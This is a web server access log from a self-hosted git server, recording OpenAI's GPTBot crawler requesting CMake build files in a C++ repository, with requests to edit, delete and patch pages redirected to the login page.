git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14877] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:47:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11322] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:18:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9848] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:47:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:18:47:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 911] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21945] [Gzip 14.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9848] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20503] [Gzip 16.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10301] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:47:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:18:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21556] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11405] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:47:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:18:47:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:18:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15496] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:18:47:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:18:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11433] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11277] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11322] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:18:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31936] [Gzip 10.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9855] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10370] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:18:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10145] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:18:48:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 